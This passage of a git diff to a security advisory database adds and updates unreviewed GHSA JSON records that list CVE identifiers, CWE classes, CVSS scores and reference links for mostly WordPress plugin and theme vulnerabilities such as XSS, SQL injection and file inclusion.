"2026-02-19T18:31:53Z", "aliases": [ "CVE-2026-27057" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PenciDesign Penci Filter Everything penci-filter-everything allows Stored XSS.This issue affects Penci Filter Everything: from n/a through <= 1.7.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:26Z" diff --git a/advisories/unreviewed/2026/02/GHSA-pxxq-rvgm-p9rp/GHSA-pxxq-rvgm-p9rp.json b/advisories/unreviewed/2026/02/GHSA-pxxq-rvgm-p9rp/GHSA-pxxq-rvgm-p9rp.json new file mode 100644 index 0000000000000..554cf7a287241 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pxxq-rvgm-p9rp/GHSA-pxxq-rvgm-p9rp.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pxxq-rvgm-p9rp", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69308" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in TeconceTheme Nestbyte Core nestbyte-core allows Blind SQL Injection.This issue affects Nestbyte Core: from n/a through <= 1.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69308" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/nestbyte-core/vulnerability/wordpress-nestbyte-core-plugin-1-2-sql-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q2ch-643m-222m/GHSA-q2ch-643m-222m.json b/advisories/unreviewed/2026/02/GHSA-q2ch-643m-222m/GHSA-q2ch-643m-222m.json new file mode 100644 index 0000000000000..7546a6fac5b53 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q2ch-643m-222m/GHSA-q2ch-643m-222m.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q2ch-643m-222m", + "modified": "2026-02-20T18:31:40Z", + "published": "2026-02-20T18:31:40Z", + "aliases": [ + "CVE-2026-2333" + ], + "details": "Improper Neutralization of Special Elements used in a Command ('Command Injection') in Owl opds 2.2.0.4 allows Command Injection via a crafted network request.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2333" + }, + { + "type": "WEB", + "url": "https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2026-2333" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q2q8-xrr4-fqjh/GHSA-q2q8-xrr4-fqjh.json b/advisories/unreviewed/2026/02/GHSA-q2q8-xrr4-fqjh/GHSA-q2q8-xrr4-fqjh.json index 76c4dd18a5568..07bc403cd3f0c 100644 --- a/advisories/unreviewed/2026/02/GHSA-q2q8-xrr4-fqjh/GHSA-q2q8-xrr4-fqjh.json +++ b/advisories/unreviewed/2026/02/GHSA-q2q8-xrr4-fqjh/GHSA-q2q8-xrr4-fqjh.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-q2q8-xrr4-fqjh", - "modified": "2026-02-19T18:31:53Z", + "modified": "2026-02-20T18:31:27Z", "published": "2026-02-19T18:31:53Z", "aliases": [ "CVE-2026-27059" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PenciDesign Penci Recipe penci-recipe allows DOM-Based XSS.This issue affects Penci Recipe: from n/a through <= 4.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:27Z" diff --git a/advisories/unreviewed/2026/02/GHSA-q577-6r28-hw22/GHSA-q577-6r28-hw22.json b/advisories/unreviewed/2026/02/GHSA-q577-6r28-hw22/GHSA-q577-6r28-hw22.json new file mode 100644 index 0000000000000..4a931a9eea668 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q577-6r28-hw22/GHSA-q577-6r28-hw22.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q577-6r28-hw22", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69337" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in don-themes Wolmart Core wolmart-core allows Blind SQL Injection.This issue affects Wolmart Core: from n/a through <= 1.9.6.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69337" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/wolmart-core/vulnerability/wordpress-wolmart-core-plugin-1-9-6-sql-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q682-57gm-p99w/GHSA-q682-57gm-p99w.json b/advisories/unreviewed/2026/02/GHSA-q682-57gm-p99w/GHSA-q682-57gm-p99w.json new file mode 100644 index 0000000000000..8694d16cec456 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q682-57gm-p99w/GHSA-q682-57gm-p99w.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q682-57gm-p99w", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-67994" + ], + "details": "Missing Authorization vulnerability in YayCommerce YayCurrency yaycurrency allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects YayCurrency: from n/a through <= 3.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67994" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/yaycurrency/vulnerability/wordpress-yaycurrency-plugin-3-3-arbitrary-content-deletion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q6xg-x4rx-4p97/GHSA-q6xg-x4rx-4p97.json b/advisories/unreviewed/2026/02/GHSA-q6xg-x4rx-4p97/GHSA-q6xg-x4rx-4p97.json new file mode 100644 index 0000000000000..1404ef75d3f44 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q6xg-x4rx-4p97/GHSA-q6xg-x4rx-4p97.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q6xg-x4rx-4p97", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68543" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in thembay Diza diza allows PHP Local File Inclusion.This issue affects Diza: from n/a through <= 1.3.15.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68543" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/diza/vulnerability/wordpress-diza-theme-1-3-15-local-file-inclusion-vulnerability-2?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q8m6-hjhf-m246/GHSA-q8m6-hjhf-m246.json b/advisories/unreviewed/2026/02/GHSA-q8m6-hjhf-m246/GHSA-q8m6-hjhf-m246.json index 02d5d01f65136..712d15e9fdcbd 100644 --- a/advisories/unreviewed/2026/02/GHSA-q8m6-hjhf-m246/GHSA-q8m6-hjhf-m246.json +++ b/advisories/unreviewed/2026/02/GHSA-q8m6-hjhf-m246/GHSA-q8m6-hjhf-m246.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-q8m6-hjhf-m246", - "modified": "2026-02-19T21:30:48Z", + "modified": "2026-02-20T18:31:32Z", "published": "2026-02-19T21:30:48Z", "aliases": [ "CVE-2026-27343" ], "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in VanKarWai Airtifact airtifact allows PHP Local File Inclusion.This issue affects Airtifact: from n/a through <= 1.2.91.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-98" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T21:18:32Z" diff --git a/advisories/unreviewed/2026/02/GHSA-q8wg-gw6g-8c93/GHSA-q8wg-gw6g-8c93.json b/advisories/unreviewed/2026/02/GHSA-q8wg-gw6g-8c93/GHSA-q8wg-gw6g-8c93.json new file mode 100644 index 0000000000000..692cea57e14ed --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q8wg-gw6g-8c93/GHSA-q8wg-gw6g-8c93.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q8wg-gw6g-8c93", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2025-70833" + ], + "details": "An Authentication Bypass vulnerability in Smanga 3.2.7 allows an unauthenticated attacker to reset the password of any user (including the administrator) and fully takeover the account by manipulating POST parameters. The issue stems from insecure permission validation in check-power.php.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70833" + }, + { + "type": "WEB", + "url": "https://github.com/LX-66-LX/cve/issues/4" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qfwf-756h-2p4g/GHSA-qfwf-756h-2p4g.json b/advisories/unreviewed/2026/02/GHSA-qfwf-756h-2p4g/GHSA-qfwf-756h-2p4g.json index 8b16527cca469..8b9223e1a7b48 100644 --- a/advisories/unreviewed/2026/02/GHSA-qfwf-756h-2p4g/GHSA-qfwf-756h-2p4g.json +++ b/advisories/unreviewed/2026/02/GHSA-qfwf-756h-2p4g/GHSA-qfwf-756h-2p4g.json @@ -50,7 +50,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-787" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-qq6w-x794-mfrc/GHSA-qq6w-x794-mfrc.json b/advisories/unreviewed/2026/02/GHSA-qq6w-x794-mfrc/GHSA-qq6w-x794-mfrc.json new file mode 100644 index 0000000000000..f57ffd28acb36 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qq6w-x794-mfrc/GHSA-qq6w-x794-mfrc.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qq6w-x794-mfrc", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69377" + ], + "details": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in vanquish User Extra Fields wp-user-extra-fields allows Path Traversal.This issue affects User Extra Fields: from n/a through <= 17.0.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69377" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/wp-user-extra-fields/vulnerability/wordpress-user-extra-fields-plugin-17-0-arbitrary-file-deletion-vulnerability-2?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qqj5-wp73-78fr/GHSA-qqj5-wp73-78fr.json b/advisories/unreviewed/2026/02/GHSA-qqj5-wp73-78fr/GHSA-qqj5-wp73-78fr.json new file mode 100644 index 0000000000000..2a3fa7b421b2c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qqj5-wp73-78fr/GHSA-qqj5-wp73-78fr.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qqj5-wp73-78fr", + "modified": "2026-02-20T18:31:37Z", + "published": "2026-02-20T18:31:37Z", + "aliases": [ + "CVE-2025-69393" + ], + "details": "Missing Authorization vulnerability in Jthemes Exzo exzo allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Exzo: from n/a through <= 1.2.4.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69393" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/exzo/vulnerability/wordpress-exzo-theme-1-2-4-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qv9f-wvw4-25rj/GHSA-qv9f-wvw4-25rj.json b/advisories/unreviewed/2026/02/GHSA-qv9f-wvw4-25rj/GHSA-qv9f-wvw4-25rj.json new file mode 100644 index 0000000000000..01a9f5ad82d64 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qv9f-wvw4-25rj/GHSA-qv9f-wvw4-25rj.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qv9f-wvw4-25rj", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22371" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Gustavo gustavo allows PHP Local File Inclusion.This issue affects Gustavo: from n/a through <= 1.2.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22371" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/gustavo/vulnerability/wordpress-gustavo-theme-1-2-2-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qvpj-hxx2-jj7g/GHSA-qvpj-hxx2-jj7g.json b/advisories/unreviewed/2026/02/GHSA-qvpj-hxx2-jj7g/GHSA-qvpj-hxx2-jj7g.json new file mode 100644 index 0000000000000..e4fb96b475bdb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qvpj-hxx2-jj7g/GHSA-qvpj-hxx2-jj7g.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qvpj-hxx2-jj7g", + "modified": "2026-02-20T18:31:33Z", + "published": "2026-02-20T18:31:33Z", + "aliases": [ + "CVE-2025-53217" + ], + "details": "Missing Authorization vulnerability in staviravn AIO WP Builder all-in-one-wp-builder allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects AIO WP Builder: from n/a through <= 2.0.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53217" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/all-in-one-wp-builder/vulnerability/wordpress-aio-wp-builder-plugin-2-0-2-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qx85-r5h6-jm6f/GHSA-qx85-r5h6-jm6f.json b/advisories/unreviewed/2026/02/GHSA-qx85-r5h6-jm6f/GHSA-qx85-r5h6-jm6f.json new file mode 100644 index 0000000000000..07b6e5396aba9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qx85-r5h6-jm6f/GHSA-qx85-r5h6-jm6f.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qx85-r5h6-jm6f", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-68025" + ], + "details": "Missing Authorization vulnerability in Addonify Addonify Floating Cart For WooCommerce addonify-floating-cart allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Addonify Floating Cart For WooCommerce: from n/a through <= 1.2.17.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68025" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/addonify-floating-cart/vulnerability/wordpress-addonify-floating-cart-for-woocommerce-plugin-1-2-17-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r5c8-59gv-v4x8/GHSA-r5c8-59gv-v4x8.json b/advisories/unreviewed/2026/02/GHSA-r5c8-59gv-v4x8/GHSA-r5c8-59gv-v4x8.json new file mode 100644 index 0000000000000..ee09b0f2fd791 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r5c8-59gv-v4x8/GHSA-r5c8-59gv-v4x8.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r5c8-59gv-v4x8", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69306" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in TeconceTheme Electio Core electio-core allows Blind SQL Injection.This issue affects Electio Core: from n/a through <= 1.4.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69306" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/electio-core/vulnerability/wordpress-electio-core-plugin-1-4-sql-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r8fr-76pj-5h7j/GHSA-r8fr-76pj-5h7j.json b/advisories/unreviewed/2026/02/GHSA-r8fr-76pj-5h7j/GHSA-r8fr-76pj-5h7j.json new file mode 100644 index 0000000000000..bbe7a802209ed --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r8fr-76pj-5h7j/GHSA-r8fr-76pj-5h7j.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r8fr-76pj-5h7j", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69324" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Basix NEX-Forms nex-forms-express-wp-form-builder allows Stored XSS.This issue affects NEX-Forms: from n/a through <= 9.1.7.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69324" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/nex-forms-express-wp-form-builder/vulnerability/wordpress-nex-forms-plugin-9-1-7-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rf9x-x7wj-42rg/GHSA-rf9x-x7wj-42rg.json b/advisories/unreviewed/2026/02/GHSA-rf9x-x7wj-42rg/GHSA-rf9x-x7wj-42rg.json index 9fb7b080ef19d..6624df5aeb400 100644 --- a/advisories/unreviewed/2026/02/GHSA-rf9x-x7wj-42rg/GHSA-rf9x-x7wj-42rg.json +++ b/advisories/unreviewed/2026/02/GHSA-rf9x-x7wj-42rg/GHSA-rf9x-x7wj-42rg.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-rf9x-x7wj-42rg", - "modified": "2026-02-19T18:31:52Z", + "modified": "2026-02-20T18:31:27Z", "published": "2026-02-19T18:31:52Z", "aliases": [ "CVE-2026-25362" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in FooPlugins FooGallery foogallery allows Stored XSS.This issue affects FooGallery: from n/a through <= 3.1.11.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:19Z" diff --git a/advisories/unreviewed/2026/02/GHSA-rfpg-r65c-g86m/GHSA-rfpg-r65c-g86m.json b/advisories/unreviewed/2026/02/GHSA-rfpg-r65c-g86m/GHSA-rfpg-r65c-g86m.json new file mode 100644 index 0000000000000..6e18ef924077c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rfpg-r65c-g86m/GHSA-rfpg-r65c-g86m.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rfpg-r65c-g86m", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2025-69408" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes HealthFirst healthfirst allows PHP Local File Inclusion.This issue affects HealthFirst: from n/a through <= 1.0.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69408" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/healthfirst/vulnerability/wordpress-healthfirst-theme-1-0-1-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rhvr-p49q-rhmm/GHSA-rhvr-p49q-rhmm.json b/advisories/unreviewed/2026/02/GHSA-rhvr-p49q-rhmm/GHSA-rhvr-p49q-rhmm.json new file mode 100644 index 0000000000000..01cfa74bf1647 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rhvr-p49q-rhmm/GHSA-rhvr-p49q-rhmm.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rhvr-p49q-rhmm", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22375" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Impacto Patronus impacto-patronus allows PHP Local File Inclusion.This issue affects Impacto Patronus: from n/a through <= 1.2.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22375" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/impacto-patronus/vulnerability/wordpress-impacto-patronus-theme-1-2-3-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rjh6-2p75-696h/GHSA-rjh6-2p75-696h.json b/advisories/unreviewed/2026/02/GHSA-rjh6-2p75-696h/GHSA-rjh6-2p75-696h.json new file mode 100644 index 0000000000000..e9212e5fdb578 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rjh6-2p75-696h/GHSA-rjh6-2p75-696h.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rjh6-2p75-696h", + "modified": "2026-02-20T18:31:33Z", + "published": "2026-02-20T18:31:33Z", + "aliases": [ + "CVE-2024-56208" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in desertthemes NewsMash newsmash allows Stored XSS.This issue affects NewsMash: from n/a through <= 1.0.71.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-56208" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/newsmash/vulnerability/wordpress-newsmash-theme-1-0-71-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rm7g-73m3-759p/GHSA-rm7g-73m3-759p.json b/advisories/unreviewed/2026/02/GHSA-rm7g-73m3-759p/GHSA-rm7g-73m3-759p.json new file mode 100644 index 0000000000000..b0fa0302552e7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rm7g-73m3-759p/GHSA-rm7g-73m3-759p.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rm7g-73m3-759p", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68564" + ], + "details": "Missing Authorization vulnerability in sendy Sendy sendy allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Sendy: from n/a through <= 3.4.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68564" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/sendy/vulnerability/wordpress-sendy-plugin-3-2-7-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rmj8-x3h3-24rh/GHSA-rmj8-x3h3-24rh.json b/advisories/unreviewed/2026/02/GHSA-rmj8-x3h3-24rh/GHSA-rmj8-x3h3-24rh.json new file mode 100644 index 0000000000000..4c35f4822bb33 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rmj8-x3h3-24rh/GHSA-rmj8-x3h3-24rh.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rmj8-x3h3-24rh", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69310" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in TeconceTheme Woodly Core woodly-core allows Blind SQL Injection.This issue affects Woodly Core: from n/a through <= 1.4.", + "severity": [], + "affected": [], + "references": [ + { + "type": 